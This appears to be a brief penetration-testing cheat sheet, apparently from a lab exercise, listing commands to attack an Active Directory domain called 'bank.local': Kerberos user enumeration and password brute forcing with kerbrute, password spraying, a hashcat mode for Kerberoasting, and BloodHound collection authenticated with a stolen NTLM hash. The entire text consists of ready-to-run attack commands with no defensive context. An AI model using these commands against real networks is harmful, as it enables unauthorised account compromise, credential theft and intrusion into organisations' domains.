⇒ Nmap
⇒ Enumerate Users $ kerbrute userenum -d bank.local —dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
⇒ Bruteforce User $ kerbrute bruteuser -d bank.local —dc 10.10.10.10 rockyou.txt nik
⇒ Passwword Spray $ kerbrute passwordspray -d bank.local —dc 10.10.10.10 user.txt ‘Password@123!’
⇒ Kerberoasting 13100 hashcat mode
⇒ bloodhound-python bloodhound-python -u ‘nik’ —hashes ‘aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d’ -d ‘bank.local’ -ns 10.10.10.10